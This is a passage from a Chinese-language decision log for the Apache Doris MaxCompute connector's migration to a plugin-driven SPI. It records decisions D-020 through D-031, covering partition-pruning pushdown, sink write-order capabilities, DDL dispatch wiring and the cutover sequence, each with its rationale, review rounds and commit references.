gate(1);② 实 `checkOnlyPartitionEquality` 遍历 `ConnectorExpression` 树(`ConnectorAnd` 全 conjunct / `ConnectorComparison` EQ 且 col 左 lit 右 / `ConnectorIn` 非 NOT-IN 且 value 为分区列、全 literal),镜像 legacy `checkOnlyPartitionEqualityPredicate`;③ 纯静态 `shouldUseLimitOptimization` 合成 gate(1)&&gate(3)&&gate(2)。默认 OFF=保守回退 legacy。clean-room 设计验证 `w17wzd0el` 0 mustFix + impl review `walkff1vf` 1 mustFix(IN-value 守卫缺杀手测,已补 test+mutation G)收敛。UT 26/26、checkstyle 0、import-gate 净、mutation 8 向红。commit `952b08e0cc8` | 2026-06-08 | ✅ | +| D-031 | — | **P4-T06e FIX-PRUNE-PUSHDOWN 新增 additive 6 参 `planScan` SPI overload 透传裁剪分区(DG-1)**:翻闸后 plugin-driven MaxCompute 读路径 Nereids `SelectedPartitions` 在 translator 被丢、`MaxComputeScanPlanProvider` 恒传 `requiredPartitions=emptyList` → ODPS read session 跨全分区(纯性能/内存回归,行正确)。FE 元数据半边 FIX-PART-GATES 已落([D-028]),缺 translator→SPI→connector 透传(原 READ-C2「②」半)。修 = `ConnectorScanPlanProvider` 加 6 参 `planScan(...,List requiredPartitions)` **default**(委托 5 参,零破坏其余 6 连接器,仅 MaxCompute override)+ `PluginDrivenScanNode` 加 `selectedPartitions` 字段/setter/三态 `resolveRequiredPartitions`(NOT_PRUNED→null 全扫 / pruned-非空→names / pruned-空→fe-core 短路无 split,镜像 legacy `MaxComputeScanNode:718-731`)+ translator plugin 分支注入 + MaxCompute `toPartitionSpecs` 喂两 read-session 路径。**契约**:null/空=全部、非空=子集、零分区 fe-core 短路不下达 SPI。clean-room `w31i0vfo5` 1 轮收敛 0 mustFix。commit `072cd545c54` | 2026-06-08 | ✅ | +| D-030 | — | **P4-T06e FIX-BIND-STATIC-PARTITION 新增 SPI capability `SINK_REQUIRE_FULL_SCHEMA_ORDER` + 回退 D-029 的 cols 位置索引为 full-schema 索引(用户批准扩 scope)**:翻闸后 MaxCompute 写走通用 `bindConnectorTableSink`,该路径克隆自 JDBC(按名 cols 序投影),而 MaxCompute BE/JNI writer **按位置**映射数据到完整表 schema → 静态分区无列名 INSERT bind 抛、重排/部分显式列名静默错列。修正 = 镜像 legacy `bindMaxComputeTableSink`:对**按位置写**的连接器(声明新 capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`,MaxCompute 声明、JDBC/ES 不声明)恒投影到 full-schema 序(填 NULL/默认);JDBC 维持 cols 序。**并回退 D-029**:分布索引 cols→full-schema(否则 partial-static/重排错列)。判别键三轮收敛 static→partitioned→capability。clean-room 3 轮收敛 0 mustFix(`wi3mnjymb`/`wy299gtsh`/`wlwpw0b2s`)。commit `7cc86c66440` | 2026-06-07 | ✅ | +| D-029 | — | **P4-T06e FIX-WRITE-DISTRIBUTION 新增 SPI capability `SINK_REQUIRE_PARTITION_LOCAL_SORT`(Option A)**〔⚠️其「分区列按 **cols** 位置索引」已被 **D-030** 回退为 full-schema 索引——partial-static/重排显式列名下 cols 索引会错列〕:翻闸后 MaxCompute 写走通用 `PhysicalConnectorTableSink`,丢 legacy 动态分区 hash+local-sort(ODPS Storage API "writer has been closed")。新增 `ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT`(default 不声明)+ MaxCompute `getCapabilities()` 声明它 + `SUPPORTS_PARALLEL_WRITE`;sink 重写 legacy 3 分支(分区列按 **cols** 位置索引非 legacy full-schema)。替代(隐式 derive / `ConnectorWriteOps` 方法)见详录。clean-room `ww1g95bba` 1 轮收敛 0 must-fix。commit `f0adedba20c` | 2026-06-07 | ✅ | +| D-028 | — | **翻闸功能未完整,补 P4-T06c 接线(用户签字)**:live 验证 recon 代码核实——翻闸(Batch C)只接通 读(SELECT)/CREATE TABLE/写(INSERT);**DROP TABLE / CREATE DB / DROP DB / SHOW PARTITIONS / partitions() TVF 的 FE 分发从未接到 SPI**(连接器侧 P4-T01/T02 已实现,FE 零调用方)→ live 会红 5 项。根因 `PluginDrivenExternalCatalog` 仅 override `createTable`、`metadataOps==null`,且 SHOW PARTITIONS/TVF 仍 legacy `instanceof MaxComputeExternalCatalog` 分发。**决策 = 翻闸前全补接线**:Batch D 前插 **P4-T06c**(通用 PluginDriven 分发,非 MC 专有)把 DDL(create/drop db、drop table)+ SHOW PARTITIONS + partitions TVF 接到已有 SPI,目标 **live 全绿**,再 Batch D。同解 Batch D §2 删-vs-rewire 冲突(先 rewire,Batch D 只删残留 legacy) | 2026-06-07 | ✅ | +| D-027 | — | P4-T06b 翻闸落地 + Batch D 移除范围(2 决策,用户签字):**翻闸** `CatalogFactory.SPI_READY_TYPES += "max_compute"` + 删 legacy `case "max_compute"`(gate 全绿:compile/checkstyle 0/import-gate 0);**D-1 时序** = flip 先行、legacy 子系统删除 + fe-core odps 依赖 drop **待用户 live ODPS 验证后**做(保 flip 独立可回退);**D-2 依赖范围** = fe-core 仅删直接 `odps-sdk-*` 声明,transitive-via-fe-common 留(fe-common 供连接器/be-extensions)。Batch D 完整闭包(21 删 / ~30 清 / keep / pom)见 `designs/P4-batchD-maxcompute-removal-design.md`(OQ-3 穷举 re-grep 满足)。**2 SPI 新增登记 §20 E11**(D-026 预授):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`;T06a 复核修 `PluginDrivenTableSink.getExplainString` `writeConfig==null` NPE 守卫记一笔 | 2026-06-07 | ✅ | +| D-026 | — | P4 Batch C 翻闸设计(用户签字,design-only):**D-1** capability signal = 新增 `ConnectorWriteOps.usesConnectorTransaction()` default false(MC=true;executor 据此在调任何 throwing-default 写法前分流 txn-model vs JDBC insert-handle);**D-2** 两 commit(`[P4-T06a]` 写接线/绑定/R-004 隔离测 dormant + `[P4-T06b]` flip 末提);**D-3** 静态分区/overwrite 绑定**入 cutover**(避 INSERT OVERWRITE PARTITION 翻闸回归)。**两新 SPI**(均 default-preserving):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`(impl 时 E11 登记)。设计 `designs/P4-T05-T06-cutover-design.md` | 2026-06-06 | ✅ | +| D-025 | — | P4-T04 写计划 5 决策(D-1/D-2a 用户签字、D-3/D-4/D-5 主线定):D-1 **OQ-2=Approach A**(`planWrite` 在 finalizeSink 一处建 ODPS 写 session + `setWriteSession` 绑 txn + 盖 `txn_id`/`write_session_id`,无运行期注入 hook);D-2a 含 **fe-core seam fill**(`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区;`staticPartitionSpec` 加 `PluginDrivenInsertCommandContext` 非基类——避 `MCInsertCommandContext` override/shadow);D-3 抽 `MaxComputeDorisConnector.getSettings()`(legacy 单 `settings` 同供 scan+write,抽出=忠实港);D-4 `supportsInsert()`=true 余最小化(`beginInsert`/`finishInsert`/`getWriteConfig` 留 throwing-default,实际 executor 调用面待 Batch C);D-5 静态分区作 `getWriteContext()` col→val map | 2026-06-06 | ✅ | +| D-024 | — | P4-T03 两 fork(用户签字):(1) txn id 经新增 `ConnectorSession.allocateTransactionId()`(fe-core `Env.getNextId` 背书)由连接器分配——尊重 [D-015]/U3,补 id-less 连接器(MC 无外部 id)的分配器机制;(2) ODPS 写 session 创建挪 T04 planWrite(T03 = 纯事务容器,over W4 委派、gate 关 dormant)| 2026-06-06 | ✅ | +| D-023 | — | P4 maxcompute 启 full adopter(recon §9 option A):W-phase 后按 5 批(A 读/DDL parity → B 写/事务 → C 翻闸 → D 清引用+删 legacy → E 测)落地 + cutover;批次计划 tasks/P4 | 2026-06-06 | ✅ | +| D-022 | — | 写/事务 SPI 设计:A 连接器事务为源·桥接 / B1 commit 载荷 opaque bytes / C1 block-id 窄 callback seam / D INSERT·DELETE·MERGE(defer procedures)/ E 写-plan-provider 仿 scan | 2026-06-06 | ✅ | +| D-021 | — | P4 maxcompute 采 scope=C(写-SPI RFC 先行):先做共享写/事务 SPI + 通用层解耦(W-phase),再逐连接器 adopter | 2026-06-06 | ✅ | | D-020 | — | 单 `hms` catalog 多格式 scan 路由 = 方案 B(`ConnectorMetadata.getScanPlanProvider(handle)` per-table default);细化 D-005(design-only,实现批 E/P7)| 2026-06-05 | ✅ | | D-019 | — | P3 hudi 采用 hybrid:现做 model-agnostic 连接器硬化+测试(behind gate),推迟 catalog 模型落地+cutover 到 hive/HMS migration | 2026-06-04 | ✅ | | D-018 | U6 | `ConnectorColumnStatistics` 用 javadoc 类型映射表 + IAE 保证类型安全 | 2026-05-24 | ✅ | @@ -40,6 +56,149 @@ ## 详细记录(时间倒序) +### D-031 — P4-T06e FIX-PRUNE-PUSHDOWN 新增 additive 6 参 planScan SPI overload 透传裁剪分区(DG-1) + +- **日期**:2026-06-08 +- **状态**:✅ 生效 +- **关联**:[FIX-PRUNE-PUSHDOWN 设计](./tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md)、[review-rounds](./reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md)、[复审 §B DG-1](./reviews/P4-maxcompute-full-rereview-2026-06-07.md)、[D-028](FIX-PART-GATES 只落元数据半边)、[DV-015] +- **背景**:翻闸后 plugin-driven MaxCompute 读走通用 `PluginDrivenScanNode`。Nereids `PruneFileScanPartition` 借 FIX-PART-GATES 加的分区元数据 API **算出** `SelectedPartitions`,但 `PhysicalPlanTranslator` plugin 分支(`:753-758`)**从不**调 `setSelectedPartitions`(对比 Hive `:773`/legacy-MC `:797`/Hudi `:882`),`PluginDrivenScanNode` 无承接字段,`MaxComputeScanPlanProvider` 恒传 `requiredPartitions=Collections.emptyList()`(`:201`/`:320`)→ ODPS read session 跨**全分区**。3 lens 对抗复审无法证伪。**纯性能/内存回归**(MaxCompute 未 override `applyFilter`→conjunct 不清→BE 重算→行正确)。这正是原 cutover-review READ-C2 修复建议的「②透传 selectedPartitions→planScan 接 requiredPartitions」半——FIX-PART-GATES 只落「①元数据 API」半([D-028])。 +- **决策**:(a) `ConnectorScanPlanProvider` 加 6 参 `planScan(session,handle,columns,filter,limit,List requiredPartitions)` **default** 方法,委托回 5 参(镜像既有 5 参 limit overload 模式)→ **零破坏** es/jdbc/hive/paimon/hudi/trino(继承 default),唯一 override=MaxCompute。**契约**:`null`/空=不裁剪 scan all;非空=仅扫这些分区名(`SelectedPartitions.selectedPartitions` keySet);「裁剪为零」由 fe-core 短路、永不到 SPI。(b) `PluginDrivenScanNode` 加 `selectedPartitions` 字段(默认 `NOT_PRUNED`)+ setter + 纯函数 `resolveRequiredPartitions`(三态:`!isPruned`→null / pruned-非空→names / pruned-空→空 list)+ `getSplits` 短路(空 list→无 split,镜像 legacy `MaxComputeScanNode:724-727`)+ 6 参调用。(c) `PhysicalPlanTranslator` plugin 分支注入 `setSelectedPartitions(fileScan.getSelectedPartitions())`。(d) MaxCompute override 6 参,`toPartitionSpecs(List)`→`List`(镜像 legacy `new PartitionSpec(key)`)喂**两** read-session 路径(标准 + limit-opt)。 +- **替代方案**:① 改 `planScan` 签名(破坏全 7 连接器)——否决,default overload 零破坏;② 编码进 `ConnectorTableHandle`(如 Hive/Hudi 经 `applyFilter` 存 pruned partitions)——MaxCompute 未 override `applyFilter` 且会重导出 Nereids 已算的裁剪、less faithful;③ `ConnectorSession` 携带——session 非 scan 级、hacky。capability/overload-additive 与 P0-1/P0-2/P0-3 模式一致。 +- **影响**:4 产线文件(`ConnectorScanPlanProvider` SPI +default / `MaxComputeScanPlanProvider` override+`toPartitionSpecs`+两路径 threading / `PluginDrivenScanNode` 字段+setter+helper+短路 / `PhysicalPlanTranslator` 注入)+ 2 UT。**scope 边界**:Hudi-SPI plugin 分支(`visitPhysicalHudiScan`)本次不接——生产不可达(`SPI_READY_TYPES` 不含 hudi)+ Hudi provider 走 default 忽略 requiredPartitions,deferred DV-006。**与 NG-7(batch-mode)解耦**但为其前置。**Batch-D 红线**:删 legacy `MaxComputeScanNode` 须待本 fix 落(读裁剪下推逻辑副本)。**follow-up**:wiring 无 fe-core 端到端 UT → [DV-015];真值闸 live e2e(p2 `test_max_compute_partition_prune.groovy` + EXPLAIN/profile 证仅扫目标分区)。 + +### D-030 — P4-T06e FIX-BIND-STATIC-PARTITION 新增 SPI capability SINK_REQUIRE_FULL_SCHEMA_ORDER + 回退 D-029 索引(用户批准扩 scope) + +- **日期**:2026-06-07 +- **状态**:✅ 生效 +- **关联**:[FIX-BIND-STATIC-PARTITION 设计](./tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md)、[review-rounds](./reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md)、[D-029](被部分回退)、[D-026 DECISION-3] +- **背景**:翻闸后真实 MaxCompute catalog = `PluginDrivenExternalCatalog`,所有 MC 写走通用 `bindConnectorTableSink`。该方法克隆自 `bindJdbcTableSink`(JDBC 按列名生成 INSERT SQL、数据 cols/用户序即可),但 **MaxCompute BE/JNI writer 按位置映射** Arrow 列到 `writeSession.requiredSchema()`(完整表 schema 序)。后果:① 静态分区无列名 `INSERT INTO mc PARTITION(pt='x') SELECT <非分区列>` 列数校验抛(F19/F48 blocker);② 静态分区列未在 full-schema 末尾 → BE 末尾擦除契约错位;③ **非分区** MC 重排/部分显式列名静默错列/丢列。legacy `bindMaxComputeTableSink` **无条件** full-schema 投影(不论分区与否)——通用路径漏了这层。 +- **决策**:(a) 新增 `ConnectorCapability.SINK_REQUIRE_FULL_SCHEMA_ORDER`("连接器按位置写 full-schema",default 不声明);MaxCompute `getCapabilities()` 声明之、JDBC/ES 不声明;`PluginDrivenExternalTable.requiresFullSchemaWriteOrder()` 读之。(b) `bindConnectorTableSink` 分支键 = `table.requiresFullSchemaWriteOrder()`:true→full-schema 投影(`getColumnToOutput`+`getOutputProjectByCoercion(getFullSchema())`,镜像 legacy,对**全**MC 写形);false→cols 序(JDBC/ES)。(c) **回退 D-029**:`PhysicalConnectorTableSink.getRequirePhysicalProperties` 分区列索引 cols→full-schema(因 child 现恒 full-schema 序;cols 索引在 partial-static/重排下错列)。(d) `selectConnectorSinkBindColumns` 无列名时剔除静态分区列(镜像 legacy);`InsertUtils` VALUES 路径加 `UnboundConnectorTableSink` 分支。 +- **替代方案**:判别键 = `!staticPartitionColNames.isEmpty()`(round-1 证伪:纯动态重排错列)→ `!getPartitionColumns().isEmpty()`(round-2 证伪:非分区 MC 重排/部分错列)→ **capability**(终态 = legacy 全 parity)。亦考虑 bind 期查 `connector.getWritePlanProvider()!=null`(更重、less explicit);capability 与 P0-2 模式一致且可扩展(未来按位置写连接器自声明)。 +- **影响**:4 产线文件(`ConnectorCapability` SPI / `MaxComputeDorisConnector` / `PluginDrivenExternalTable` reader / `BindSink` bind + `PhysicalConnectorTableSink` 索引)+ `InsertUtils`。两写 capability 正交但有硬依赖(`SINK_REQUIRE_PARTITION_LOCAL_SORT` ⟹ `SINK_REQUIRE_FULL_SCHEMA_ORDER`,已 javadoc 登记,nit P03-V3-1)。**Batch-D 红线**:删 legacy `bindMaxComputeTableSink`/`PhysicalMaxComputeTableSink` 须待本 fix 落(已落)。**follow-up**:bind 投影无 fe-core 单测 harness → DV-014;真值闸 live e2e(p2 `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`)。 + +--- + +### D-029 — P4-T06e FIX-WRITE-DISTRIBUTION 新增 SPI capability SINK_REQUIRE_PARTITION_LOCAL_SORT + +- **日期**:2026-06-07 +- **状态**:✅(已落 commit `f0adedba20c`;live e2e 真值闸待真实 ODPS) +- **关联**:[FIX-WRITE-DISTRIBUTION 设计](./tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md)、[review-rounds](./reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md)、[复审报告 §A.NG-2/NG-4](./reviews/P4-maxcompute-full-rereview-2026-06-07.md)、[D-001](capability 沿用先例)、[DV-013]、Batch-D 红线 +- **背景**:翻闸后 MaxCompute 写走通用 `PhysicalConnectorTableSink`,其 `getRequirePhysicalProperties()` 只有 `supportsParallelWrite?RANDOM:GATHER`,且 `MaxComputeDorisConnector` 无 `getCapabilities` override(空集)→ 每写落 GATHER。丢 legacy `PhysicalMaxComputeTableSink` 的动态分区 hash-by-partition + 强制 local-sort(ODPS Storage API 流式分区 writer,见新分区即关上一 writer,未分组行触发 "writer has been closed")+ 非分区/全静态并行写。通用 sink 从 JDBC/ES 克隆,无通道让连接器声明该需求。 +- **决策(Option A)**:新增 `ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT`(连接器声明动态分区写需 hash-by-partition + 强制 local-sort);MaxCompute `getCapabilities()` 声明它 + `SUPPORTS_PARALLEL_WRITE`;`PluginDrivenExternalTable.requirePartitionLocalSortOnWrite()` 读之(镜像 `supportsParallelWrite()`,经 `connector.getCapabilities().contains(...)`);`PhysicalConnectorTableSink.getRequirePhysicalProperties()` 重写 legacy 3 分支。**关键修正 vs legacy**:分区列 → child output 索引按 **cols 位置**(通用 sink 的 child 投影到 cols 序,`BindSink` 强制 `cols.size()==child output size`),非 legacy 的 full-schema 位置。default 不声明 → 其他连接器零行为变更。 +- **替代方案**:(B) 隐式 derive(`supportsParallelWrite && hasPartition && dynamic → 强制 hash+local-sort`)—— 拒:把 MC Storage-API 的 local-sort 政策强加到所有并行写分区连接器(含 per-partition 缓冲、本不需 sort 的);(C) `ConnectorWriteOps` 方法(仿 `supportsInsertOverwrite`)—— 拒:sink 读它需在 property-derivation 热路建 `ConnectorSession` + `getMetadata`,而 sibling `supportsParallelWrite()`(同方法内读)用更廉价的 `getCapabilities()` 集,不一致。 +- **影响**:fe-connector-api(1 枚举值)+ fe-connector-maxcompute(`getCapabilities`)+ fe-core(1 table 方法 + sink 3 分支重写)。blast radius:`SUPPORTS_PARALLEL_WRITE`/新能力仅 sink 分发路径读(grep 实证 2+1 reader;唯一另一 `getCapabilities` consumer `QueryTableValueFunction` 查 `SUPPORTS_PASSTHROUGH_QUERY`,MC 不声明 → 不受影响)。**Batch-D 红线**:删 `PhysicalMaxComputeTableSink`(写分发唯一逻辑副本)须待本 fix + P0-3 双落。`ShuffleKeyPruner` non-strict 少剪 + `enable_strict_consistency_dml=false` 丢 local-sort = [DV-013]。 + +### D-028 — 翻闸功能未完整,补 P4-T06c FE 分发接线(用户签字) + +- **日期**:2026-06-07 +- **状态**:✅(翻闸前置工作;实现 = P4-T06c,下一 session) +- **关联**:[tasks/P4](./tasks/P4-maxcompute-migration.md)(新增 P4-T06c)、[HANDOFF](./HANDOFF.md)「⚠️ 关键发现」、[D-027](翻闸落地)、[Batch D 设计](./tasks/designs/P4-batchD-maxcompute-removal-design.md)(前置门 + §2 处置随之改)、DV-007(`listPartition*` 零 live caller) +- **背景**:用户问「如何做 live 验证 / 验证哪些内容」。并行 recon(catalog 建法 / smoke SQL / SPI 路径映射 / build-deploy)+ **代码逐条核实** 暴出:T05/T06 翻闸**只接通**了 读(SELECT,`PluginDrivenScanNode`)/CREATE TABLE(`PluginDrivenExternalCatalog.createTable:257` override)/写(INSERT 全家,G1–G5)。**未接通**(live 会 FAIL,均 file:line 核实): + - **DROP TABLE / CREATE DB / DROP DB**:`PluginDrivenExternalCatalog` **不** override 这些、`metadataOps` **永远 null** → `ExternalCatalog.dropTable:1105`/`createDb:1004`/`dropDb:1029` 抛 `... is not supported for catalog`。(RENAME TABLE 同,且连接器侧未 port。) + - **SHOW PARTITIONS**:`ShowPartitionsCommand:202-207` allow-list 仍按 `instanceof MaxComputeExternalCatalog`,翻闸后 catalog 是 `PluginDrivenExternalCatalog` → `not allowed`。 + - **partitions() TVF**:`MetadataGenerator.partitionMetadataResult:1308-1319` `instanceof MaxComputeExternalCatalog` 落空 → `not support catalog`。 + - 连接器侧 `createDatabase/dropDatabase/dropTable`(P4-T01)+ `listPartitionNames/listPartitions/listPartitionValues`(P4-T02)**已实现但 FE 零调用方**(DV-007 已记)。tasks/P4 §批次依赖原写「翻闸即 读/写/DDL/分区/show 全切 SPI」**与代码不符**,已纠正。 +- **决策(用户 AskUserQuestion 签字,选「翻闸前全补接线」)**:视翻闸为**未完成**;Batch D 之前插 **P4-T06c**,把 DDL(createDb/dropDb/dropTable)+ SHOW PARTITIONS + partitions() TVF 的 **FE 分发接到已有连接器 SPI**。要点: + - **通用实现**(keyed on `PluginDrivenExternalCatalog` / `PLUGIN_EXTERNAL_TABLE`,**非 MC 专有**)→ ① 同时修 jdbc/es/trino 同类缺口;② 让 Batch D §2 对 `ShowPartitionsCommand`/`MetadataGenerator`/`PartitionsTableValuedFunction` 的处置从 **delete-branch** 退化为**删残留 legacy MC 引用**(先 rewire 后删,解 Batch D 设计 §2 与 RFC `:1065`/master-plan `:126` 的删-vs-rewire 冲突)。 + - DDL override 镜像现有 `createTable:257`(路由 `connector.getMetadata().{createDatabase/dropDatabase/dropTable}` + editlog)。SHOW PARTITIONS / partitions TVF 加 `PluginDrivenExternalCatalog` 分支路由 `listPartitionNames`。 + - **本任务只补 FE 接线**(连接器方法已存在)= "接线"非"重写"。 +- **scope 边界**:`partition_values()` TVF(`MetadataGenerator:2080` HMS-only)**不入 T06c**(OQ-5:legacy MC 很可能本就不支持 = 既有限制非回归,待确认)。RENAME TABLE 需连接器先 port,次要/可推迟(不在 live smoke 列表)。 +- **完成门**:T06c 落(fe-core gate + UT)→ **用户报 live 验证全绿**([D-027] D-1 的 `OdpsLiveConnectivityTest` + 手测 smoke 11 项全绿)= 翻闸真正完成 → 才解锁 Batch D。**flip 在 live 绿前保持独立可 revert**(沿 [D-027] D-1)。 + +> ⚠️ **2026-06-08 补注(DG-1 / D-031)**:本决策的「分区」接线指**元数据可见性**(SHOW PARTITIONS / partitions TVF),由 T06c + FIX-PART-GATES 落地。**read-session 分区裁剪下推**(把 Nereids 算出的 `SelectedPartitions` 真正喂到 ODPS)**不在 T06c/D-028 范围**,且后续复审 DG-1 证伪了 FIX-PART-GATES「pruning 不变式 clean」的过度声明——由 **FIX-PRUNE-PUSHDOWN(D-031)** 补齐。即:D-028/T06c 恢复元数据可见性 ✅、read-session 裁剪下推 = D-031 ✅。 + +- **日期**:2026-06-07 +- **状态**:✅(翻闸已落、gate 全绿;Batch D 移除 = 待 live 验证后做) +- **背景**:用户要求「开始下一步(T06b 翻闸)」+ 追加「fe-core 不再依赖任何 maxcompute jar」。recon(并行 re-grep + 对抗验证,OQ-3 入口门满足)证:fe-core `odps-sdk-core`/`odps-sdk-table-api` 仅经 legacy MaxCompute 子系统(7 文件 `import com.aliyun.odps`,全在删除集)可达 → 去依赖 = 删整套 legacy(21 文件)+ 清 ~30 反向引用(即整个 Batch D)。 +- **决策**: + - **翻闸(T06b)**:`CatalogFactory.SPI_READY_TYPES += "max_compute"`(:52) + 删 `case "max_compute"`(原 :146-149) + 删 unused import + 注释去 max_compute。gate 全绿(compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0/CS_EXIT=0 + import-gate 0,真实 EXIT 核)。 + - **D-1(时序)= flip 先行、移除待 live 验证**:本任务只落 flip(独立可回退);legacy 子系统删除 + pom odps drop(Batch D)挪到**用户跑 `OdpsLiveConnectivityTest`(4 个 `MC_*` 环境变量)+ 手测 smoke 绿之后**的紧邻 follow-up。理由:删 legacy 即去掉易回退的 fallback,故 flip 在 live 验证前保持独立可 revert(trino 翻闸亦 flip 先于删除)。 + - **D-2(依赖范围)= 仅删直接声明**:fe-core/pom.xml 删两 `odps-sdk-*` 块即可;fe-core 删后**零** odps 源引用,但仍经 fe-common transitive 见 `odps-sdk-core`(fe-common 留 odps 供 `MCUtils` → 连接器 + be-java-extensions),可接受(用户选 "Direct declarations only")。镜像 trino `c4ac2c5911d`(只删 fe-core 直接声明)。 +- **2 SPI 新增登记**(D-026 预授,default-preserving):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction` 录入 `01-spi-extensions-rfc.md` §20 E11。T06a 对抗复核已修 `PluginDrivenTableSink.getExplainString` 加 `writeConfig==null` 守卫(防 plan-provider 模式 EXPLAIN NPE,翻闸后可达)——记一笔。 +- **设计文档(Batch D 执行源,turnkey)**:[tasks/designs/P4-batchD-maxcompute-removal-design.md](./tasks/designs/P4-batchD-maxcompute-removal-design.md)(21 删除集 + 84 反向引用闭包 + keep 集 + pom drop + ordered TODO;执行前置门 = live 验证绿)。 + +### D-026 — P4 Batch C 翻闸设计(3 子决策 + 2 SPI 新增,用户签字) + +- **日期**:2026-06-06 +- **状态**:✅(design-only;实现 = T05 → T06,下一 fresh session) +- **背景**:Batch A+B 全完成(gate 关 dormant),下一 = Batch C(唯一 live 切点)。本场 design-first:4 路 Explore re-verify recon 锚点 + 主线核读 executor/txn 生命周期,定 dormant→live 写接线(坑3 三点)+ flip + R-004。recon 校正:GsonUtils 真锚 `:397`/`:472`(非 ~405/~478);`legacyLogTypeToCatalogType` 默认分支已出 `"max_compute"`(**无需加 case**);live executor = `PluginDrivenInsertExecutor`(非裸 `beginTransaction`);`PluginDrivenTransactionManager.begin(connectorTx)` **未** `putTxnById`(G3);`UnboundConnectorTableSink` 不携静态分区(G4)。 +- **决策**: + - **D-1(capability signal)= (A)** 新增 `ConnectorWriteOps.usesConnectorTransaction()` default false,`MaxComputeConnectorMetadata` override true。executor 据此在调任何 throwing-default 写法(`getWriteConfig`/`beginInsert`/`beginTransaction` 全 default 抛、MC 留抛=D-4)前分流 txn-model(MC)vs JDBC insert-handle。否决 (B) `getWritePlanProvider()!=null` 代理(耦合松)/(C) 复用 `ConnectorWriteType`(逆 D-4 + enum churn + getWriteConfig 调用前移)。 + - **D-2(commit 粒度)= 两 commit、flip 末**:`[P4-T06a]` = 写接线(W-a..d)+ 静态分区/overwrite 绑定(G4/G5)+ R-004 隔离 UT(全 additive/dormant-safe);`[P4-T06b]` = `CatalogFactory.SPI_READY_TYPES += "max_compute"`(:52) + 删 :146 case(唯一 live-switch 单点,易 review/revert)。 + - **D-3(静态分区/overwrite 绑定 scope)= 入 cutover(T06)**:扩 `UnboundConnectorTableSink` 携静态分区 + `InsertIntoTableCommand`/`InsertOverwriteTableCommand` 填 `PluginDrivenInsertCommandContext`(overwrite + staticPartitionSpec)。避免翻闸瞬间 INSERT OVERWRITE / 静态分区 INSERT 回归。 +- **SPI 新增(2,均 default-preserving,零 jdbc/es/trino 影响)**:`ConnectorSession.setCurrentTransaction(ConnectorTransaction)`(+ `ConnectorSessionImpl` 字段/`getCurrentTransaction` override;把 connectorTx 绑入 sink session 供 T04 `planWrite` 读,解 G1);`ConnectorWriteOps.usesConnectorTransaction()`(D-1)。impl 时登记 `01-spi-extensions-rfc.md` §20 E11。 +- **不重开 T03/T04**:Approach A locked(`planWrite` 读 `getCurrentTransaction`);本设计接线 *到* 它。R-004 拆两分:① classloader 隔离(无 creds,CI 可跑)+ ② live 连通(creds,用户跑)。 +- **设计文档**:[tasks/designs/P4-T05-T06-cutover-design.md](./tasks/designs/P4-T05-T06-cutover-design.md)(verified file:line 锚点 + 5 gap G1–G5 + lifecycle order + R-004 两分测 + ordered TODO)。 +- **T05 实现校正(2026-06-06,gate-green、待 commit)**:实现期 4-agent 对抗复核发现 §3.1/§8 ordered TODO **漏 GSON DB `:452`**(`MaxComputeExternalDatabase`,仅列了 catalog `:397`+table `:472`);折入 T05(三注册齐迁 `registerCompatibleSubtype` + 删 3 unused import),否则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast `PluginDrivenExternalCatalog`→`MaxComputeExternalCatalog` 抛 `ClassCastException`。另 2 告警判非问题(`getMetaCacheEngine` 假阳性=plugin 路径经连接器取 schema、走 "default" 桶同 es/jdbc/trino;`getMysqlType`→"BASE TABLE" 同 ES 既定行为);dormancy 告警 = 既载中间态 caveat(其"保留 registerSubtype"修法错,会撞 duplicate-label IAE)。详见设计 §3.4。 + +### D-025 — P4-T04 写计划 5 决策(OQ-2 解法 + seam fill + 三主线定) + +- **日期**:2026-06-06 +- **状态**:✅ 生效 +- **关联**:[tasks/P4 P4-T04](./tasks/P4-maxcompute-migration.md)、[P4-T04 设计](./tasks/designs/P4-T04-write-plan-design.md)、[D-024](T03/T04 边界、`setWriteSession` 槽)、[DV-009](W5 planWrite layer)、[DV-012](partition_columns 源)、OQ-2 +- **背景**:T04 把 legacy 写计划(`MCTransaction.beginInsert` 建写 session + `MaxComputeTableSink.bindDataSink`/`setWriteContext` 产 `TMaxComputeTableSink`)港入连接器 over W5 opaque-sink seam。核心难点 OQ-2 = legacy 经 `MCInsertExecutor.beforeExec` **运行期注入**的 `txn_id`/`write_session_id`、overwrite/静态分区 context 需在 plugin-driven 侧重建。 +- **决策**: + - **D-1(OQ-2 架构,用户签字)= Approach A**:executor 生命周期序 `beginTransaction`(txn_id 译前生)→translate→`finalizeSink`/`bindDataSink(insertCtx)`→`beforeExec`→coordinator ⇒ `planWrite` 跑在 finalizeSink、txn_id 已在 + ODPS 写 session 可就地建 → **planWrite 一处做完**(建 session + `session.getCurrentTransaction()`→`MaxComputeConnectorTransaction.setWriteSession` + 盖 `txn_id`/`write_session_id`)。**无运行期注入 hook**(否决 Approach B = 泛化 legacy `setWriteContext` dance)。 + - **D-2a(fe-core seam 填充,用户签字)= 含 seam fill**:`PluginDrivenTableSink.bindViaWritePlanProvider` 改收 `Optional`、读 `isOverwrite()`+`getStaticPartitionSpec()` 填 handle;**实现期细化**:`staticPartitionSpec` 加在 `PluginDrivenInsertCommandContext`(非设计「Why」倾向的基类 `BaseExternalTableInsertCommandContext`)——因 `MCInsertCommandContext` 已自带 `staticPartitionSpec`+getter 且 shadow 基类 `overwrite`,加基类会成 override/shadow 缠结(Rule 3 surgical);plugin-driven seam 只见 `PluginDrivenInsertCommandContext`,post-migration hive/iceberg 